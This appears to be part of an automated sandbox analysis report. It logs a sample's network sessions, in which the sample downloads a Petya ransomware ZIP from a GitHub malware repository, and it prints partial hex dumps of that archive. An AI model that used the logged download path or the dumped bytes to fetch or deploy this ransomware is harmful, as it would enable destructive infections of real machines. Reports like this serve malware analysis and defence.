                                                                                                                                                    2022-09-29 12:58:59 UTC2270INData Raw: eb d4 e8 71 0d eb ce c1 5a 27 5b ad 8c 7f 5d 67 67 20 2f 24 ae 07 d1 8d 0c ff c4 41 0c 12 fd f6 a9 fd ce 5f c7 9a 19 ee 98 4b 00 7e 79 83 9d ab 7c 01 df dd 56 96 26 ab 9d 94 85 cd fa a8 16 fb fd 67 37 f6 f8 bc d8 96 f8 31 f9 ad 70 6c e7 e3 05 55 fe b0 21 67 11 45 d9 12 a6 9b de 76 bd ad 6f 56 35 53 73 b5 42 7b 59 25 b3 fd 13 52 56 4f a8 f3 05 d9 6a 00 c0 23 0d 2b 5d 1c a6 4d 67 b4 3a 7b 3a 01 0f ef fb 63 88 9f d8 29 6c 5a 1e c8 0d f2 1c 56 1c dc c0 04 33 1b 3d 91 07 5f e1 be 2d 58 d6 6e 98 e6 41 19 a0 4a 51 dc 51 73 59 1a ea df a8 94 cd 84 ba 7b db f8 15 7f 6a 93 aa 12 45 03 9b 4c b0 4c 94 c3 6e 0d 12 26 d6 d8 bc 48 4d 98 27 05 d5 65 51 d3 b1 47 27 78 b6 6d fb d9 c6 7f 1f d4 ba f2 b5 75 8d 1c ff 99 a0 b8 b9 0e 12 8e 29 f5 0f 39 fc b1 c1 d2 0d e7 f5 e9 df
                                                                                                                                                    Data Ascii: qZ'[]gg /$A_K~y|V&g71plU!gEvoV5SsB{Y%RVOj#+]Mg:{:c)lZV3=_-XnAJQQsY{jELLn&HM'eQG'xmu)9
                                                                                                                                                    2022-09-29 12:58:59 UTC2286INData Raw: 72 3d 79 bd f7 70 42 9d 62 60 55 34 88 fd 5f dc af 0a fe 61 c7 a7 8c de 8c a4 2f 53 14 e3 2e 89 e6 cd 78 ed 7e f5 37 55 6e 5a 1d 12 13 ee 1c 0b 73 70 29 52 9d 42 40 90 6d 89 93 5c 36 ce 34 3c d3 2f 9b 97 6c e1 95 e3 90 19 03 71 6e 4a ee b6 52 6f f6 cc e6 c0 e2 e1 71 f7 43 95 a9 7b 76 39 e7 9e 50 33 02 c1 5d aa 16 21 d6 fc 1a 0d bf 60 fe db 82 dc 76 24 9e eb 6e 14 75 bf 7b 21 ff cf b7 a0 70 45 bf 2a b2 75 bb a7 49 a0 6e b7 9c e5 d8 24 08 ff 20 73 7a 6a aa 78 b4 8d 13 cc 9b 11 a7 18 37 36 1a e8 11 03 20 52 23 2e 25 76 60 8d 8f 8b c0 72 d9 cc e6 1e e4 7e e5 c8 00 3f 8f 4d 09 f6 6f 12 33 8d 00 25 01 65 dc b2 7c b3 e4 9f 23 02 83 63 85 db 85 50 74 fc f0 9e 31 c7 6d 8c e0 25 2b 71 80 5b d8 f7 37 d1 4f 4c 54 1b 6d 2a be de 72 c2 60 38 1c f0 24 69 07 dd 0f 8b 01
                                                                                                                                                    Data Ascii: r=ypBb`U4_a/S.x~7UnZsp)RB@m\64</lqnJRoqC{v9P3]!`v$nu{!pE*uIn$ szjx76 R#.%v`r~?Mo3%e|#cPt1m%+q[7OLTm*r`8$i


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    37192.168.2.349726140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:59 UTC2289OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    38140.82.121.3443192.168.2.349726C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:59 UTC2289INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:06 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:59 UTC2289INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    39192.168.2.349727185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:59 UTC2291OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    4192.168.2.34970923.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:45 UTC188OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                    2022-09-29 12:58:45 UTC188INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                    X-Azure-Ref: 0VeCoYgAAAABR/Z6+30B1RLQsXmQnL8CBTE9OMjFFREdFMDIxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                    Cache-Control: public, max-age=225471
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:45 GMT
                                                                                                                                                    Content-Length: 55
                                                                                                                                                    Connection: close
                                                                                                                                                    X-CID: 2
                                                                                                                                                    2022-09-29 12:58:45 UTC189INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    40185.199.108.133443192.168.2.349727C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:59 UTC2291INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131293
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "db31807bd0d2739f220f59cdf06ed3d47d3bb4373e6414156d7274ec658e5f22"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 3596:11E0C:3901A7:400694:63359347
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:59 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6951-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456340.520553,VS0,VE186
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 706dfc42521ff44ac313ba4545f584cb1a08afff
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:59 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:59 UTC2292INData Raw: 50 4b 03 04 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 c5 69 3f 6d 6a b3 50 f6 03 c1 1a b8 f7 06 bc e8 4e e6 64 7c d2 a2 19 04 df 3e cc 63 7f ad 0d ab 2e 25 b6 c6 4e e4 92 f1 e3 de 02 49 83 18 f7 d9 37 7b e4 46 02 4f c1 d9 09 32 0e 77 54 3a f4 c7 82 67 94 d7 eb 64 67 0d b0 e3 80 9f 7b 94 5f 3a 03 b2 8d ed 60 1a ae e3 cf fd 4c cd b0 e9 b7 a8 f8 6a 52 b8 30 81 64 2c ae 01 f2 35 09 de 93 21 a8 1d ba de 2a 75 36 e3 0e a5 4e b8 6e 38 89 e0 52 ef 05 7b 9e 64 0a dc 0b 7c db 7b bc c0 03 b2 b3 90 ab 1b 0e 5b 9f dc bb d2 04 05 79 0b 66 e5 e5 21 c3 66 ae 41 c6 e9 c6 e8 94 83 82 0c 16 c0 97 6e 6c a7 bd ab 7d f0 b9 d5 df 40 de 8d 1b 1f 06 bc 58 c6 85 8d f0 0d 36 bb 05
                                                                                                                                                    Data Ascii: PKtIwH+Endermanch@Petya.A.exei?mjPNd|>c.%NI7{FO2wT:gdg{_:`LjR0d,5!*u6Nn8R{d|{[yf!fAnl}@X6
                                                                                                                                                    2022-09-29 12:58:59 UTC2293INData Raw: 5b 0c b1 ce b5 21 11 bb 18 ce c4 e1 47 77 5d 42 5d 91 db 1e 21 a0 f6 11 5a d2 04 f1 db 1f 26 1f 29 0f 91 97 91 52 e5 80 67 35 91 b1 b7 4c c1 f5 6f 36 3b 3a 47 ea 16 bf 26 78 a0 0a 7c 61 73 3d 34 4b fd ce a1 79 3e dc 60 47 34 fc f5 b5 ab a7 c2 e2 57 21 df ca 69 41 96 cd ab 9f d2 2f ea 32 83 bf 45 a2 ee d7 01 89 f2 92 4f ca 80 d8 e8 d2 4b 41 6f d1 00 e7 c2 88 6b a4 a5 ab 41 af 1b 00 42 f1 fd 72 d2 b0 dc 48 8b bd bf 49 7b ef 97 f6 c1 4d 0d e8 a9 6f e9 e2 f7 0d 08 52 73 61 e5 ef 4b 08 83 1a 4b 74 d5 f2 5e 49 de 6e fb d0 bd 24 0f 4d 9a 9f 02 36 80 45 c7 3d db 76 03 ec 5c 71 00 74 ee cc 75 ff a4 ef 6c 6d 04 61 9f 6f aa 75 d8 4b f6 6a ff 3d c0 12 de 51 b0 9b 38 38 e0 40 dc d6 fc 5a d4 0f 11 36 96 1d ca dc a1 5b 89 f2 f6 2f eb 97 5f ac 46 d8 8a eb a2 3f 9f 9c 8c
                                                                                                                                                    Data Ascii: [!Gw]B]!Z&)Rg5Lo6;:G&x|as=4Ky>`G4W!iA/2EOKAokABrHI{MoRsaKKt^In$M6E=v\qtulmaouKj=Q88@Z6[/_F?
                                                                                                                                                    2022-09-29 12:58:59 UTC2295INData Raw: ef 46 3b 81 34 99 f1 07 e3 30 56 a3 e4 79 68 95 e3 13 06 f1 67 75 f0 65 3a cc 59 6a da a4 44 fa 87 81 aa 34 a9 8f 07 d6 67 12 7e 67 12 cf 07 6e 27 de 38 03 61 72 74 87 4c 6e d2 55 f6 11 4f 89 b1 71 16 f6 42 66 25 46 23 41 0a 22 d5 47 6e f3 b5 7b 92 78 de 63 45 bc fa 79 fb 26 99 b8 c5 42 0e da e9 94 db 49 45 0d a8 a2 37 cf 05 7a 4c 66 49 c5 a3 08 34 1a 82 5c 7e dd cd 4d 18 f9 ef 3b 88 b5 da b3 1c 3e d0 73 cb df ff 23 e8 13 15 2c f5 10 d8 92 70 33 ea fc 6f 9f 64 b7 7b b8 fd d8 6b a6 bc e1 e4 36 db 2b 46 e0 09 66 e2 7d 6f 1b 07 1b 40 9b fa 20 ed 57 37 7f 75 9a d5 59 5e 46 54 f6 f9 d6 3e 42 38 0d 99 e3 18 98 78 f8 07 00 71 53 d8 80 39 a8 60 1a 20 59 20 e8 e6 6a d9 5c 48 7a c4 c3 52 c3 9a 0e 2c 0f 34 74 16 c0 2c f3 08 1c 95 41 32 7f 44 3a 88 79 3b c7 f7 4c 40
                                                                                                                                                    Data Ascii: F;40Vyhgue:YjD4g~gn'8artLnUOqBf%F#A"Gn{xcEy&BIE7zLfI4\~M;>s#,p3od{k6+Ff}o@ W7uY^FT>B8xqS9` Y j\HzR,4t,A2D:y;L@
                                                                                                                                                    2022-09-29 12:58:59 UTC2296INData Raw: 41 53 c1 bd 4f d5 c6 75 f6 a4 9f b1 5c 2c 8d 0f ec 41 90 d6 0d fe 70 0f fe f4 5d c5 5f 7d 85 d6 f9 5e e6 01 ef a4 e1 0d c4 74 b8 c0 62 34 4d f8 c7 39 d6 00 2e af 06 5b 47 9e 08 83 21 2f f9 b8 3f ab ee cd 5c 1a 10 5e ea 29 40 a8 27 bb 9c 29 fe d7 14 d3 6b 38 c5 bc fc a4 99 40 98 11 23 f9 dd 32 20 c7 c6 6e a3 fb 2f d6 31 45 b1 47 d9 52 57 12 76 36 8b 85 9d cd 99 ec 39 ac 39 7e d8 96 5b 66 2d 80 0a 38 f3 30 5e a8 82 21 41 35 2f b9 66 67 ec 6f 2b 93 1e 41 45 dd 82 81 96 9d 8e a5 0b 43 28 c4 c5 4b 96 5b 38 ff 83 45 c2 ac 3b 43 87 7a cc 23 be 4c 6b d5 f1 db 25 ec fb 7b ba 0a 48 f7 66 09 df eb 10 43 94 94 88 5a e1 27 59 9e 82 58 ab 84 35 95 bb 3b cf 3a 25 2c c9 2f 7a 6f 81 d5 3b f1 90 6e 69 8b 63 31 71 1e c5 0f 4b 86 ee c1 f5 63 ff ea 85 6f ea bb 00 5c 42 c2 c5
                                                                                                                                                    Data Ascii: ASOu\,Ap]_}^tb4M9.[G!/?\^)@')k8@#2 n/1EGRWv699~[f-80^!A5/fgo+AEC(K[8E;Cz#Lk%{HfCZ'YX5;:%,/zo;nic1qKco\B
                                                                                                                                                    2022-09-29 12:58:59 UTC2297INData Raw: cf 1e f7 a1 09 b8 b1 5e 56 5c 2e 9e c4 06 64 2b e5 5a 0f 25 56 e4 6d 3b f4 3d 94 75 6a 0d ff 05 53 aa 29 39 91 d0 e6 38 b2 f8 b2 11 7a 25 8a b9 69 9c 04 73 d6 cf c0 ed a9 07 ae bf 14 19 de 53 14 7c 82 fd 5a 5f 47 ba 47 25 68 3f 97 41 25 06 d3 77 6c 45 3c 99 47 f6 79 97 2a c1 b2 dc 6f c3 ef 32 fc ea 24 b9 3d b2 ba 03 c5 b4 58 2c e3 3c b4 7e dd 33 11 eb 70 5b 16 28 bd 18 a6 f5 8b 22 3e 9a e8 50 94 96 34 21 89 35 e1 0b b9 f0 f1 73 c5 38 2d 39 af 46 ff e6 47 15 5b 3e 88 da 97 f0 a2 31 d5 de 8e c9 20 e6 76 54 f3 92 8f 83 b2 d6 53 38 10 75 21 ba 35 af 7c d0 9a f0 c9 1a f3 0b 64 6f f3 3b 4d 99 ea 1d ac ec 4f 6f 95 5e 66 ba c2 49 ec b2 e3 bb b1 02 44 c3 39 6a 8b 3b 75 bc ad 8d 4b 52 53 b0 64 8d d0 33 5a 50 ce 58 52 36 b3 76 df 8f 54 22 1c ab c5 9c 34 96 2a af 6a
                                                                                                                                                    Data Ascii: ^V\.d+Z%Vm;=ujS)98z%isS|Z_GG%h?A%wlE<Gy*o2$=X,<~3p[(">P4!5s8-9FG[>1 vTS8u!5|do;MOo^fID9j;uKRSd3ZPXR6vT"4*j
                                                                                                                                                    2022-09-29 12:58:59 UTC2299INData Raw: b2 35 fb df 8a 96 e1 20 9e 75 c6 13 1c 93 06 47 b4 d2 25 1f 3b 46 67 8a cc 1d c6 19 22 84 fd b7 0e 01 6d b6 12 b6 50 20 bf 36 65 34 af e5 a0 6b 0e 91 c6 13 cd f8 16 e8 0a 1d 83 fd 6b 11 e8 ec b2 7d 51 cf db 09 63 49 a0 bb a1 a8 ea dc 6f 52 5f 81 10 08 f8 5c a5 bb 76 b5 8f ac 91 25 c8 9f 84 c8 d1 c8 8d c4 8c ea 5b f4 9f 5a b5 ba ef b1 33 d8 cf 98 18 d9 2e bd 11 ea 71 bf 20 43 56 60 b0 68 cc 08 8b ae a4 ee 88 5e 15 91 6a b4 33 a4 06 59 00 62 20 c1 c2 56 21 6c 34 05 65 f1 90 ab 87 49 03 ba 22 5b 4c 65 1d 72 01 f9 59 48 df eb 5a c0 ce 59 0c f1 8e 3c dc b2 1f a6 50 e2 90 d9 de fd 4f c2 c4 f7 1c 2f b3 82 a1 55 04 20 95 de 49 cd dd e3 fc 6e b5 ec 77 aa d0 b4 6d 38 a6 b1 16 50 13 fc 0c fd f1 03 78 67 f3 5f 17 03 e7 56 60 c9 58 74 89 ab bf e0 27 98 2c 88 c1 57 6b
                                                                                                                                                    Data Ascii: 5 uG%;Fg"mP 6e4kk}QcIoR_\v%[Z3.q CV`h^j3Yb V!l4eI"[LerYHZY<PO/U Inwm8Pxg_V`Xt',Wk
                                                                                                                                                    2022-09-29 12:58:59 UTC2300INData Raw: ff cc 64 9b 24 b6 cf 76 31 61 66 7a 33 9d 94 28 eb e0 05 53 d1 8d ad 80 41 1b dd 34 c0 63 14 ea 91 d4 f0 c9 21 44 cb 9f 85 9e 17 5f 0d 43 43 c6 fd 40 1a 66 9c 70 06 40 3e 1d 49 64 8c b6 97 83 7a 6e e4 fe 68 c4 15 c6 1c ed 94 f0 3d b5 8b 02 ac df 98 96 35 66 8c b9 f8 e5 35 84 e2 b5 8c a4 06 d1 3c 3b 47 91 ee b9 28 51 af 33 1d 6c 3d 1c a1 b3 f1 00 1d a8 19 94 8c c6 27 ea ef 7e c0 18 f1 f1 6f 46 1a f7 ec 0b 89 4c 3b 78 5a 75 6f 2e 38 96 f0 13 65 bc 1e 12 67 c4 c1 93 ef 47 15 79 97 6a ed fb 80 48 d3 01 a7 0c d9 5d 0b 25 b3 9b 1f 63 a9 d2 a1 f5 2c 44 b4 d6 ed e8 e1 20 be 98 87 bf d6 c0 5d 86 41 d7 1b 89 e9 55 bc 64 41 7f cf 6b 2a 8b be 6f 7b c5 04 27 6d b9 86 3f 13 db 22 9c bd 3f ef 7b 75 fe a3 df 28 48 d5 18 82 aa 35 9f 9a b7 50 fd 9c ea 58 77 06 4f 07 9e 1f
                                                                                                                                                    Data Ascii: d$v1afz3(SA4c!D_CC@fp@>Idznh=5f5<;G(Q3l='~oFL;xZuo.8egGyjH]%c,D ]AUdAk*o{'m?"?{u(H5PXwO
                                                                                                                                                    2022-09-29 12:58:59 UTC2301INData Raw: 09 31 3f e3 f7 e9 c7 ff 80 d4 b8 b9 97 3a c3 2d e0 b5 c6 73 21 73 86 70 d3 fd 71 39 a8 96 53 9a b5 3f e6 23 68 9c 32 6a bc 16 6b bf 39 12 af 6b 02 a9 13 57 3c 1d 32 9e 2d d1 4e bd a3 96 a7 16 da 56 af 62 eb ee 76 ed 2a ac df e5 75 85 92 87 57 74 88 b4 b8 c8 b8 97 85 fe 3b b0 59 1b 90 61 1e ae 06 df 99 22 18 71 b4 b1 c0 d2 e2 86 b8 77 e3 40 a2 0d 34 6f a1 d5 68 06 e1 8c 15 c0 64 57 d9 bb 9b 21 ea 85 55 85 93 14 db b8 d2 88 89 06 50 65 ec 6c a6 51 11 c6 1d 1c f9 0a 48 61 29 e4 c6 72 f4 d6 81 e2 c3 ad bc d0 6a 96 26 06 fa 71 99 f5 95 8c 06 4f 1a db c4 07 a5 f6 7e fa bc 59 b5 d8 4f 5c 8a d1 ab 1f 8b c6 37 4f 20 7f b1 75 fb 32 bd 24 ea f9 e8 85 2f 0e 6a 0e 2f 10 94 8e 98 c3 ea ed 74 be af 94 a2 68 65 6a 53 57 49 d7 9c e3 31 09 d5 e2 dd 86 40 a4 2b 8f 58 b0 ea
                                                                                                                                                    Data Ascii: 1?:-s!spq9S?#h2jk9kW<2-NVbv*uWt;Ya"qw@4ohdW!UPelQHa)rj&qO~YO\7O u2$/j/thejSWI1@+X
                                                                                                                                                    2022-09-29 12:58:59 UTC2303INData Raw: c5 00 7e 13 39 b1 ab 0e 3e 07 0c 56 a3 15 e3 6f d6 ca fb d9 b4 10 77 58 48 f4 de dc 74 76 2d f1 ca 93 5f ee 59 40 06 e1 94 c1 a6 f3 14 17 12 14 6c 4a 4e 90 ce cb 4d 5f 41 13 4f f5 17 14 12 34 e9 85 c4 ce b5 da ac a3 55 6c a2 7f ee 37 1a 2f 8c 75 ab 13 ac 4a 49 0b 86 74 84 22 84 c5 f4 10 2e 93 93 e4 4a 17 e0 55 68 14 81 e8 21 45 bd 0b 5f 8f c5 56 66 93 44 93 ac dc ff 66 06 75 0f 02 d1 8c be ef 40 45 f6 84 48 04 d8 46 f9 7f bd 82 76 24 ed 17 c8 37 70 41 44 e7 5a c7 4c 1a 10 a8 40 cd 88 92 7f ce 28 f3 0d 7b 46 97 ef 4e 21 ed 7a 67 77 2b 1c a3 02 25 50 ce 21 af 47 1f 30 6a 1a 07 19 c0 29 34 23 c5 43 f7 e2 c8 e9 03 d9 de cf ca 45 66 ec 4f 5f d3 f6 0f 0d c4 fc b2 2a 54 96 97 1a eb 53 a5 25 5e 3f 87 cc 4c a4 37 11 bd 9f db e6 94 75 6e 94 3c b1 cf 58 94 ae 14 5d
                                                                                                                                                    Data Ascii: ~9>VowXHtv-_Y@lJNM_AO4Ul7/uJIt".JUh!E_VfDfu@EHFv$7pADZL@({FN!zgw+%P!G0j)4#CEfO_*TS%^?L7un<X]
                                                                                                                                                    2022-09-29 12:58:59 UTC2304INData Raw: 58 a3 83 e8 c9 a0 a8 e8 6b 83 28 19 43 f0 50 31 a3 2c 81 66 59 fc 30 11 70 58 6b f6 07 ae f5 5b 49 a5 07 9a 11 04 ae e1 da 82 d8 d0 30 11 70 cc 3b b2 be 6d 85 af 35 35 b6 85 98 bf 6c 81 a2 1f fc b5 5b db 1e fb ed 2d ab e7 6c 2e 10 af ad 13 a7 fc 05 2e cf dc ce 53 10 6e db da d1 54 8a 96 13 56 86 87 7a 43 b8 cb 34 6d dc 47 fc b8 c3 6b ed f4 36 b4 3b 21 8e 1f e5 cb 90 1e 5c e8 66 a2 e9 c0 8e cb 92 a7 e2 17 2b 1e 5d 2e 35 00 79 d5 69 7f c0 3d 85 91 12 01 c8 86 04 45 3e eb b6 bc f3 ca f1 30 9c 04 64 cb 40 44 d3 f7 f8 cd 3a 00 f1 50 66 fb ea 65 6b f6 77 2c e8 3c 40 f4 28 24 1c e3 24 49 7f 5b cf 0f 89 84 ed d9 2e dd fd 94 78 db 6e 95 16 42 65 32 00 b9 50 a9 bf 4d 93 1e b8 10 e9 3a 40 28 67 77 fc 4e 5a 2f 30 e1 4f 72 67 9f dc 85 96 96 e7 1e 93 97 8e bb c4 f3 80
                                                                                                                                                    Data Ascii: Xk(CP1,fY0pXk[I0p;m55l[-l..SnTVzC4mGk6;!\f+].5yi=E>0d@D:Pfekw,<@($$I[.xnBe2PM:@(gwNZ/0Org
                                                                                                                                                    2022-09-29 12:58:59 UTC2305INData Raw: 6a da 60 92 2d a2 c6 43 b3 5b b4 c6 85 db a7 46 be e4 59 57 42 83 93 3f ca 0c c1 5e 63 a7 cd 83 55 8e 5d 70 9e b9 8d 47 bb bc 55 c4 c8 6e 6e 97 10 c4 73 f6 93 dc 9a 58 87 e1 78 01 b6 bb c5 5c 72 99 9a e6 06 11 f1 a1 e3 5b 05 74 9e 1e 9d 14 16 c4 58 82 55 fb 81 02 8a 87 30 c6 15 0b 71 6a 8c a5 95 d1 f6 18 1a bc 3d 49 9f 09 40 a3 5e 4c 70 8a 6e 4b 42 d5 04 f7 92 2a fa c1 6c 8e 5e af 2d 27 21 df 09 f9 dc 3f 33 8b f5 67 21 60 5e 63 e7 25 7a 41 50 11 5f f7 8a ed 33 98 22 a0 44 65 1f 97 e7 ff 87 0b 2a 9c 2a c8 15 ec ac 8a 2c fc 23 17 fd 55 9b a4 3f 2e 95 8b 13 44 1a 2b e3 2b a6 01 17 ff 0f 40 72 32 be e6 bf 69 76 8b 79 19 53 5c e0 bb 4c 0f d4 e1 d9 c6 bf 21 29 be 11 46 32 44 6f 1b 05 b5 99 2d 55 e8 ef e7 c7 39 89 6e cc f6 da a8 14 17 ab 2b ee 01 40 74 a3 3f 23
                                                                                                                                                    Data Ascii: j`-C[FYWB?^cU]pGUnnsXx\r[tXU0qj=I@^LpnKB*l^-'!?3g!`^c%zAP_3"De**,#U?.D++@r2ivyS\L!)F2Do-U9n+@t?#
                                                                                                                                                    2022-09-29 12:58:59 UTC2307INData Raw: fa 23 31 96 9b cc 51 d6 58 89 43 cb 99 6a 3d d6 24 c9 7d 06 c3 3a 28 e5 ce 94 a0 2d 45 a1 ea f1 2e 8d 10 e9 dd f1 c9 9f 11 b8 af 80 75 55 7b 40 ff 91 d9 e0 8f 10 e7 c9 2b 7f f3 a1 2c 59 51 97 f4 10 62 a1 fc ce 32 90 ae 08 29 0a 96 a6 55 81 89 f2 49 2d 16 3d 5a 45 8a 2e 6f f0 0e 19 1f 56 d2 92 88 e2 98 cd 2b 64 c6 21 e7 47 2d 03 0c c1 a2 0e 1e cd 08 fb 76 c0 01 93 18 d7 6f 31 89 58 57 aa 52 05 94 a2 98 39 73 d0 1e 9d f1 f9 cb 38 3a 64 e0 cf 9c 89 bc 9c 13 17 5f f2 f6 a7 7c a1 ea 76 39 a6 4f c7 ce dc 5a 02 a1 95 bc a6 65 e2 81 a7 c3 a5 eb d2 42 00 9f f7 70 18 85 fb 6f d1 bd 94 ef 3b 2b ec 68 f0 a7 b7 fd 2d 05 0b 9f c1 fc f8 e6 40 bf 96 bd 87 4f 8c d7 79 00 fe 32 d8 32 59 c8 9f 3b 15 51 dc 47 f7 23 c1 ea 49 cb 4b 36 77 46 46 71 fb 6b 62 e8 7b 6b 3e 15 a3 9b
                                                                                                                                                    Data Ascii: #1QXCj=$}:(-E.uU{@+,YQb2)UI-=ZE.oV+d!G-vo1XWR9s8:d_|v9OZeBpo;+h-@Oy22Y;QG#IK6wFFqkb{k>
